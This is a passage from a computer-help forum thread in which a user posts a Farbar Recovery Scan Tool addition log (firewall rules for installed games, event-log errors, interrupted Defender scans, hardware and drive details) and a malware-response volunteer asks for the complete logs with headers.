FirewallRules: [{3A662476-6436-4340-BDBA-D72F5B1DDBCB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\StickFightTheGame\StickFight.exe () [File not signed]
FirewallRules: [{2C981B99-5654-4040-AB2C-0C85F9BF7F6D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\StickFightTheGame\StickFight.exe () [File not signed]
FirewallRules: [TCP Query User{648A1015-13D1-4750-959B-B3707421499C}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\2\the jackbox party pack 2.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\2\the jackbox party pack 2.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [UDP Query User{168C3E0D-E85E-4884-A7C9-B97F50C07352}C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\2\the jackbox party pack 2.exe] => (Block) C:\users\miggy\downloads\the jackbox party pack collection\the jackbox party pack collection\2\the jackbox party pack 2.exe (Jackbox Games, Inc.) [File not signed]
FirewallRules: [TCP Query User{F3243ACC-FECE-4A39-814F-08991E028BD7}C:\program files (x86)\steam\steamapps\common\super people playtest\bravohotelgame\binaries\win64\bravohotelclient-win64-shipping.protected.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\super people playtest\bravohotelgame\binaries\win64\bravohotelclient-win64-shipping.protected.exe => No File
FirewallRules: [UDP Query User{9F956304-1916-4BBE-B51E-B9955FA67210}C:\program files (x86)\steam\steamapps\common\super people playtest\bravohotelgame\binaries\win64\bravohotelclient-win64-shipping.protected.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\super people playtest\bravohotelgame\binaries\win64\bravohotelclient-win64-shipping.protected.exe => No File
FirewallRules: [{72AFCC65-2896-411A-86AB-C02C9CDECE95}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aim Lab\AimLab.exe => No File
FirewallRules: [{4E2F0CD6-5EBE-4A56-9ACE-A151BB38F9D8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aim Lab\AimLab.exe => No File
FirewallRules: [TCP Query User{6A6EAC4D-2160-4919-9E3B-52A6F2148730}C:\users\miggy\appdata\local\packages\microsoft.4297127d64ec6_8wekyb3d8bbwe\localcache\local\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe] => (Allow) C:\users\miggy\appdata\local\packages\microsoft.4297127d64ec6_8wekyb3d8bbwe\localcache\local\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe
FirewallRules: [UDP Query User{9792E1CF-36FA-4196-A0A3-10AE3AD1A005}C:\users\miggy\appdata\local\packages\microsoft.4297127d64ec6_8wekyb3d8bbwe\localcache\local\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe] => (Allow) C:\users\miggy\appdata\local\packages\microsoft.4297127d64ec6_8wekyb3d8bbwe\localcache\local\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe
FirewallRules: [{CFD8B036-590C-4835-9836-19C2225A051D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Stardew Valley\Stardew Valley.exe (ConcernedApe) [File not signed]
FirewallRules: [{C94C221F-D765-409C-9AB1-EB9B32BEF9EC}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Stardew Valley\Stardew Valley.exe (ConcernedApe) [File not signed]
FirewallRules: [TCP Query User{8F0BC06D-47BF-4A1B-8748-76D98EA42492}C:\program files (x86)\call of duty vanguard\vanguard.exe] => (Allow) C:\program files (x86)\call of duty vanguard\vanguard.exe => No File
FirewallRules: [UDP Query User{8C990EE8-302F-4E35-BE93-F404C8D857C8}C:\program files (x86)\call of duty vanguard\vanguard.exe] => (Allow) C:\program files (x86)\call of duty vanguard\vanguard.exe => No File
FirewallRules: [{58A4BBA7-11E4-4337-992B-6CF72F8D65AE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CastleCrashers\castle.exe () [File not signed]
FirewallRules: [{5805045B-A6F2-48E9-ADE3-6136EF9A8988}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CastleCrashers\castle.exe () [File not signed]
FirewallRules: [TCP Query User{EA95B6C7-268C-467F-84CD-4FB5AC97A4FC}C:\users\miggy\downloads\4.0.0b\fnaf forgotten pizzeria.exe] => (Block) C:\users\miggy\downloads\4.0.0b\fnaf forgotten pizzeria.exe => No File
FirewallRules: [UDP Query User{1CE7380D-889B-43D9-9F29-2EDADE5CBBC4}C:\users\miggy\downloads\4.0.0b\fnaf forgotten pizzeria.exe] => (Block) C:\users\miggy\downloads\4.0.0b\fnaf forgotten pizzeria.exe => No File
FirewallRules: [TCP Query User{E45A8FBA-CC96-4DBD-907C-CD0FFA1E1E2F}C:\users\miggy\appdata\local\medal\app-4.1000.0\medal.exe] => (Allow) C:\users\miggy\appdata\local\medal\app-4.1000.0\medal.exe => No File
FirewallRules: [UDP Query User{71A2705A-4191-47D8-940A-1166319F2FA9}C:\users\miggy\appdata\local\medal\app-4.1000.0\medal.exe] => (Allow) C:\users\miggy\appdata\local\medal\app-4.1000.0\medal.exe => No File
FirewallRules: [TCP Query User{1B3540C0-880A-4830-8EA9-F4E767B15295}C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe => No File
FirewallRules: [UDP Query User{7DC1365C-3980-42E2-8358-9FBD287115ED}C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe => No File
FirewallRules: [{03ECDC1B-87E1-4ADD-8478-838BEA1ADAC8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's Rainbow Six Siege\RainbowSix_Vulkan.exe => No File
FirewallRules: [{82B24CAA-22CD-474F-9603-C584E23551C7}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's Rainbow Six Siege\RainbowSix_Vulkan.exe => No File
FirewallRules: [{C104DE8D-F4CA-4B1B-8E31-EEEAA8A34C9E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Slappyball\Smackball.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [{60FD9D66-A167-4E88-B93E-C8E846A175B3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Slappyball\Smackball.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [{3F69A2ED-5DE2-4023-878A-981FC71D1A1A}] => (Allow) C:\Users\Miggy\AppData\Local\Programs\Opera GX\82.0.4227.50\opera.exe => No File
FirewallRules: [{C144C0C8-2B57-421B-86BB-1A7E3AD62915}] => (Allow) C:\Program Files (x86)\Nox\bin\Nox.exe => No File
FirewallRules: [{1F4F8DFE-0CAB-47F0-9183-053E15271167}] => (Allow) C:\Program Files (x86)\Bignox\BigNoxVM\RT\NoxVMHandle.exe => No File
FirewallRules: [{81992F8E-512D-4DA7-9DAC-488D45E25D38}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Gladio and Glory\Gladio and Glory\Gladio and Glory.exe => No File
FirewallRules: [{8FA454E8-45DF-4A08-8AAA-22B1A63B59A4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Gladio and Glory\Gladio and Glory\Gladio and Glory.exe => No File
FirewallRules: [TCP Query User{14653097-6416-4742-9C82-CB6934D75E94}C:\users\miggy\appdata\local\plutonium\bin\plutonium-bootstrapper-win32.exe] => (Allow) C:\users\miggy\appdata\local\plutonium\bin\plutonium-bootstrapper-win32.exe (Plutonium Project -> Plutonium Project) [File not signed]
FirewallRules: [UDP Query User{080D84FE-1FEF-4314-AA75-DCB6FD8301F6}C:\users\miggy\appdata\local\plutonium\bin\plutonium-bootstrapper-win32.exe] => (Allow) C:\users\miggy\appdata\local\plutonium\bin\plutonium-bootstrapper-win32.exe (Plutonium Project -> Plutonium Project) [File not signed]
FirewallRules: [TCP Query User{25147A68-BF60-45EC-9583-E036CA89AAF4}C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe] => (Block) C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [UDP Query User{5303B7F7-593C-4FE0-8D06-028805E1A292}C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe] => (Block) C:\program files (x86)\epic games\launcher\engine\binaries\win64\epicwebhelper.exe (Epic Games Inc. -> Epic Games, Inc.)
FirewallRules: [TCP Query User{D9362094-CBEE-45FF-A39E-07BABE2891C8}C:\program files (x86)\minecraft launcher\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe] => (Block) C:\program files (x86)\minecraft launcher\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe
FirewallRules: [UDP Query User{3E2E905F-A92A-4FD0-9610-1E3EA900E7D3}C:\program files (x86)\minecraft launcher\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe] => (Block) C:\program files (x86)\minecraft launcher\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe
FirewallRules: [TCP Query User{00C1C5F8-22B4-4750-895A-C3290EB3F317}C:\program files (x86)\steam\steamapps\common\ironsight_wpg\ironsight.exe] => (Block) C:\program files (x86)\steam\steamapps\common\ironsight_wpg\ironsight.exe => No File
FirewallRules: [UDP Query User{47B0D35C-8AE4-4385-BD07-21CBBFD2FC47}C:\program files (x86)\steam\steamapps\common\ironsight_wpg\ironsight.exe] => (Block) C:\program files (x86)\steam\steamapps\common\ironsight_wpg\ironsight.exe => No File
FirewallRules: [{3B141ECB-9639-4E7F-8F76-780368F6DDFF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\VRChat\VRChat.exe () [File not signed]
FirewallRules: [{34756878-EE88-4AE5-B99F-C95EF86641C8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\VRChat\VRChat.exe () [File not signed]
FirewallRules: [{8F876A7A-5287-4288-BD35-11D979C8802A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Pacify\Pacify.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [{7763C119-63E6-404D-9836-BD172EBE332B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Pacify\Pacify.exe (Epic Games, Inc.) [File not signed]
FirewallRules: [{04B67B1C-2819-4DBC-A81D-6C6C9EDBB6F3}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{E13084FB-B670-4131-A5A7-F7DB8373FFCF}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{8D2CD827-1C1D-4DA6-B7B5-8D580DE48C58}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{0104ADC6-9CAF-4DCA-BE6B-0DA2840D2800}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [TCP Query User{BEBAB357-E674-4617-BD1A-F6AB3FCDB7D2}C:\users\miggy\appdata\roaming\bloom\bloom.exe] => (Block) C:\users\miggy\appdata\roaming\bloom\bloom.exe => No File
FirewallRules: [UDP Query User{925781FD-FCC4-432F-8C07-D07A1C5EAFC7}C:\users\miggy\appdata\roaming\bloom\bloom.exe] => (Block) C:\users\miggy\appdata\roaming\bloom\bloom.exe => No File
FirewallRules: [{637A7132-8D14-42F8-920B-B680BCA48683}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\VRChat\launch.exe () [File not signed]
FirewallRules: [{F64D2521-B66A-4829-8FBE-C10617C50F8D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\VRChat\launch.exe () [File not signed]
FirewallRules: [{B59E8386-4265-4E90-BAF8-CAD8DECCE6D3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned_BE.exe (BattlEye Innovations e.K. -> BattlEye Innovations)
FirewallRules: [{FCF2F178-BD0F-47A7-8F44-E9DCD60B4DC1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned_BE.exe (BattlEye Innovations e.K. -> BattlEye Innovations)
FirewallRules: [{3835BCC7-FABB-4D0F-81A0-DD004D72FD79}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned.exe (Smartly Dressed Games Ltd. -> ) [File not signed]
FirewallRules: [{6E906B8E-DECB-426F-98F9-98530E0E9838}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Unturned\Unturned.exe (Smartly Dressed Games Ltd. -> ) [File not signed]
FirewallRules: [TCP Query User{EA2280C2-20B0-42F1-8974-CA8D4D530938}C:\users\miggy\downloads\5.0.1\fnaf forgotten pizzeria.exe] => (Block) C:\users\miggy\downloads\5.0.1\fnaf forgotten pizzeria.exe () [File not signed]
FirewallRules: [UDP Query User{E5CC6F2D-4A52-4C56-A097-FEA84E711E27}C:\users\miggy\downloads\5.0.1\fnaf forgotten pizzeria.exe] => (Block) C:\users\miggy\downloads\5.0.1\fnaf forgotten pizzeria.exe () [File not signed]
FirewallRules: [{0BA33FB8-0DDA-473D-9A0F-69C2664D21D6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Poppy Playtime\PlaytimeLauncher\PlaytimeLauncher.exe => No File
FirewallRules: [{6217A59E-EBE3-4859-9E09-13C70D22D77C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Poppy Playtime\PlaytimeLauncher\PlaytimeLauncher.exe => No File
FirewallRules: [{93C48266-F67B-414C-8798-072A31D4A908}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe (The qBittorrent Project) [File not signed]
FirewallRules: [{573A6C3A-5FD0-496E-B86A-01C574A076AE}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe (The qBittorrent Project) [File not signed]
FirewallRules: [TCP Query User{0D3DB0DC-AC15-4DCC-AE15-C16DF0FA0FF8}C:\users\miggy\downloads\tjoc-r-beta-0.1.0\tjoc- r beta 0.1.0\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe] => (Allow) C:\users\miggy\downloads\tjoc-r-beta-0.1.0\tjoc- r beta 0.1.0\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe => No File
FirewallRules: [UDP Query User{34131973-3A86-4AA5-A1E3-43D38FAFCBAB}C:\users\miggy\downloads\tjoc-r-beta-0.1.0\tjoc- r beta 0.1.0\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe] => (Allow) C:\users\miggy\downloads\tjoc-r-beta-0.1.0\tjoc- r beta 0.1.0\windowsnoeditor\engine\binaries\win64\ue4game-win64-shipping.exe => No File
FirewallRules: [TCP Query User{10B7ADFC-36E5-4136-8904-4BB2274FE63C}C:\program files (x86)\steam\steamapps\common\batman arkham asylum goty\binaries\shippingpc-bmgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\batman arkham asylum goty\binaries\shippingpc-bmgame.exe => No File
FirewallRules: [UDP Query User{47D1A8F9-9D77-4C46-99BE-D8821B3F3E1D}C:\program files (x86)\steam\steamapps\common\batman arkham asylum goty\binaries\shippingpc-bmgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\batman arkham asylum goty\binaries\shippingpc-bmgame.exe => No File
FirewallRules: [{FEF65CC4-341A-4FD2-A824-A6D329480713}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Smithworks\Smithworks.exe () [File not signed]
FirewallRules: [{6749EDCE-B127-4A53-A5AF-90CE152BAD78}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Smithworks\Smithworks.exe () [File not signed]
FirewallRules: [{171A237C-E9C7-4615-8B1E-5C9C788979AD}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.85.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{D6F304CE-E1E7-4468-A75D-139D43303668}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.85.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{AD0903A5-230D-40EC-9560-A4EDEA0FC48D}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.85.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{BAC90EB2-EF43-4263-B3F9-FC92B93BF152}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.85.3409.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [TCP Query User{61834926-009D-423A-BDD2-E8081CBEB7D5}C:\users\miggy\appdata\roaming\energy\energy.exe] => (Block) C:\users\miggy\appdata\roaming\energy\energy.exe => No File
FirewallRules: [UDP Query User{13EE0F33-1B8A-4274-9855-871FD73A4497}C:\users\miggy\appdata\roaming\energy\energy.exe] => (Block) C:\users\miggy\appdata\roaming\energy\energy.exe => No File
FirewallRules: [{8C3803A5-EA5C-4889-9857-9FDB4DA23242}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [TCP Query User{01E21564-B49B-48F9-8E36-D8CF45BEEEDC}C:\program files (x86)\steam\steamapps\common\awayout\haze1\binaries\win64\awayout.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\awayout\haze1\binaries\win64\awayout.exe => No File
FirewallRules: [UDP Query User{0F00EB50-6FA3-4928-9F2C-945043197824}C:\program files (x86)\steam\steamapps\common\awayout\haze1\binaries\win64\awayout.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\awayout\haze1\binaries\win64\awayout.exe => No File
FirewallRules: [{6486CC56-8E36-4F5B-84C6-D5DFA851ACB3}] => (Allow) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\103.0.1264.49\msedgewebview2.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{6F92321E-DF3A-45A7-A575-6A779E9B8D46}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix_BE.exe => No File
FirewallRules: [{8BF615D7-A12A-483A-A40A-BFE9D6F2C0A6}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix_BE.exe => No File
FirewallRules: [{753ADBE4-FB37-42A8-8798-757F858B08C2}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix.exe => No File
FirewallRules: [{A6F6C4AB-87DA-4C6B-ADED-12C8F7909461}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's Rainbow Six Siege\RainbowSix.exe => No File
FirewallRules: [{6717B840-E914-4EFE-BE62-1FB363E7F09A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fears to Fathom - Episode 2\Fears To Fathom - Norwood Hitchhike.exe () [File not signed]
FirewallRules: [{61A809E9-FEB5-46ED-8906-BDFAA3FF8A94}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fears to Fathom - Episode 2\Fears To Fathom - Norwood Hitchhike.exe () [File not signed]
FirewallRules: [{93A10216-66C0-42BF-ABC4-0342110C8055}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Batman Arkham City GOTY\Binaries\Win32\BatmanAC.exe (Warner Bros. Interactive Entertainment, Inc. -> Rocksteady Studios Ltd.)
FirewallRules: [{52240A98-1551-4AB2-B3A2-64624335D754}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Batman Arkham City GOTY\Binaries\Win32\BatmanAC.exe (Warner Bros. Interactive Entertainment, Inc. -> Rocksteady Studios Ltd.)
FirewallRules: [{CAAC3CD2-7CDF-4592-BFFE-01EEEA05AF16}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\GarrysMod\hl2.exe () [File not signed]
FirewallRules: [{E1C306E0-1DDD-47AA-BB45-826B3153976D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\GarrysMod\hl2.exe () [File not signed]
 
==================== Restore Points =========================
 
10-07-2022 16:42:28 Installed DirectX
13-07-2022 18:22:15 Removed Dual-Core Optimizer.
 
==================== Faulty Device Manager Devices ============
 
 
==================== Event log errors: ========================
 
Application errors:
==================
Error: (07/16/2022 12:10:37 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x1900
Faulting application start time: 0x01d8994707d5ecc9
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 36d0ee37-f58a-43d9-be8b-9c2b8115e329
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (07/15/2022 11:05:01 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program chrome.exe version 103.0.5060.114 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
 
Process ID: 63d0
 
Start Time: 01d898d58448bb99
 
Termination Time: 4294967295
 
Application Path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
Report Id: dffcbb73-8528-4d0c-8ea2-70a8d5a2c018
 
Faulting package full name: 
 
Faulting package-relative application ID: 
 
Hang type: Top level window is idle
 
Error: (07/15/2022 07:09:09 PM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: The storage optimizer couldn't complete retrim on \\?\Volume{31c301e6-2876-4924-31af-e66339e3d9f1}\ because: The operation requested is not supported by the hardware backing the volume. (0x8900002A)
 
Error: (07/15/2022 07:03:25 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x3b84
Faulting application start time: 0x01d898b787859d26
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: b97d719a-87ab-4cea-b3b9-e6f2b32fa6c1
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (07/15/2022 06:35:27 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x14d54
Faulting application start time: 0x01d898b3a05eeb43
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 71427424-3c9f-4244-8dfc-4bb4775f7720
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (07/14/2022 11:14:19 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x4b54
Faulting application start time: 0x01d898116a40ca06
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 115e5758-376d-43b8-bb14-610180db1fcd
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (07/14/2022 03:53:23 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: BatmanAC.exe, version: 1.1.0.0, time stamp: 0x520000f7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00000001
Faulting process id: 0x5a34
Faulting application start time: 0x01d897cab8eff5b5
Faulting application path: C:\Program Files (x86)\Steam\steamapps\common\Batman Arkham City GOTY\Binaries\Win32\BatmanAC.exe
Faulting module path: unknown
Report Id: f43d4c35-394f-4595-a573-547c1cd90170
Faulting package full name: 
Faulting package-relative application ID:
 
Error: (07/14/2022 11:42:58 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RadeonSettings.exe, version: 10.1.1.1682, time stamp: 0x58fea395
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000000000000
Faulting process id: 0x1904
Faulting application start time: 0x01d897b0d663f446
Faulting application path: C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
Faulting module path: unknown
Report Id: 8df2ef94-e121-4e25-b9da-0d4cbd2ae1b7
Faulting package full name: 
Faulting package-relative application ID:
 
 
System errors:
=============
Error: (07/15/2022 11:55:47 PM) (Source: DCOM) (EventID: 10010) (User: MIGGYPC)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
 
Error: (07/15/2022 11:55:47 PM) (Source: DCOM) (EventID: 10010) (User: MIGGYPC)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
 
Error: (07/15/2022 11:55:42 PM) (Source: DCOM) (EventID: 10005) (User: MIGGYPC)
Description: DCOM got error "1053" attempting to start the service BcastDVRUserService_ae76358 with arguments "Unavailable" in order to run the server:
Windows.Media.Capture.Internal.AppCaptureShell
 
Error: (07/15/2022 11:55:42 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The GameDVR and Broadcast User Service_ae76358 service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (07/15/2022 11:55:42 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the GameDVR and Broadcast User Service_ae76358 service to connect.
 
Error: (07/15/2022 06:56:45 PM) (Source: DCOM) (EventID: 10010) (User: MIGGYPC)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
 
Error: (07/15/2022 06:56:45 PM) (Source: DCOM) (EventID: 10010) (User: MIGGYPC)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
 
Error: (07/15/2022 06:56:45 PM) (Source: DCOM) (EventID: 10010) (User: MIGGYPC)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
 
 
Windows Defender:
================
Date: 2022-07-15 19:09:08
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2022-07-14 11:53:58
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2022-07-11 19:01:40
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2022-07-10 18:38:28
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2022-07-07 18:00:59
Description: 
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
==================== Memory info =========================== 
 
BIOS: American Megatrends Inc. F50 11/28/2019
Motherboard: Gigabyte Technology Co., Ltd. A320M-S2H-CF
Processor: AMD Ryzen 5 3600 6-Core Processor 
Percentage of memory in use: 87%
Total physical RAM: 8139.07 MB
Available physical RAM: 1034.94 MB
Total Virtual: 20939.07 MB
Available Virtual: 10638.51 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:475.83 GB) (Free:128.86 GB) (Model: TEAM T253X2512G) NTFS
 
\\?\Volume{590e5d8c-1754-4989-bc02-b0320b4dd94a}\ () (Fixed) (Total:0 GB) (Free:0 GB) 
\\?\Volume{2461b620-0642-4655-b8ff-4e37ffcad3aa}\ () (Fixed) (Total:0.5 GB) (Free:0.08 GB) NTFS
\\?\Volume{31c301e6-2876-4924-31af-e66339e3d9f1}\ () (Fixed) (Total:0.01 GB) (Free:0 GB) NTFS
\\?\Volume{a7ea1218-f889-4125-8806-9e75e9dba896}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32
 
==================== MBR & Partition Table ====================
 
==========================================================
Disk: 0 (Protective MBR) (Size: 476.9 GB) (Disk ID: 00000000)
 
Partition: GPT.
Attempted reading MBR returned 0 bytes.
 Could not read MBR for disk 1.
 
==================== End of Addition.txt =======================


#4 axe0

  • Malware Response Team
  • 2,059 posts
  • Gender:Male
  • Location:Netherlands
  • Local time:03:17 AM

Posted 16 July 2022 - 04:34 PM

Hi,

It appears that the headers for both FRST and Addition logs are missing.

I need the complete logs for analysis, please copy and paste the logs again with the headers included as well.


Kind regards,
Axe0

#5 miggybruh

  • Topic Starter

  • Members
  • 13 posts
  • Local time:06:17 PM

Posted 16 July 2022 - 04:48 PM

My apologies, here's my FRST.txt
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 14-07-2022
Ran by Miggy (administrator) on MIGGYPC (Gigabyte Technology Co., Ltd. A320M-S2H) (16-07-2022 14:40:46)
Running from C:\Users\Miggy\Downloads
Loaded Profiles: Miggy
Platform: Microsoft Windows 10 Home Version 21H2 19044.1826 (X64) Language: English (United States)
Default browser: Chrome
Boot Mode: Normal
